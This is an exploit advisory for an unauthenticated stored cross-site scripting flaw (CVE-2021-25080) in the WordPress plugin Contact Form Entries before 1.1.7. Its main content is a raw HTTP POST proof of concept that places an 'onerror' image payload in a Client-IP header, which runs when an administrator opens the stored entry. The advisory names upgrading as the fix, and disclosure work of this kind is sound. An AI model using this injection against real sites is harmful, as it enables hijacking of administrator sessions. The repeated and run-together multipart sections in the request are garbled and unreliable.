# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) # Date: 22/12/2021# Exploit Author: gx1<gaetano.perrone[at]secsi.io># Vulnerability Discovery: Gaetano Perrone# Vendor Homepage: https://www.crmperks.com/# Software Link: https://wordpress.org/plugins/contact-form-entries/# Version: < 1.1.7# Tested on: any# References: * https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/# Description:
Contact Form Entries <1.1.7is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value,and the value is stored inside the database.# Proof Of Concept:
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length:1411
Accept: application/json, text/javascript,*/*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0(Windows NT 6.1; WOW64) AppleWebKit/537.36...
Client-IP:<img src=a onerror=alert(1)>------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"10------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"5.3.1------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
Content-Disposition: form-data; name="_wpcf7"10------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"5.3.1------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"...===============================================================================================================
The request is acccepted,and the code navigates the section $_SERVER['HTTP_CLIENT_IP'], ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS is triggered.# Solution:
Upgrade Contact Form Entries to version 1.1.7
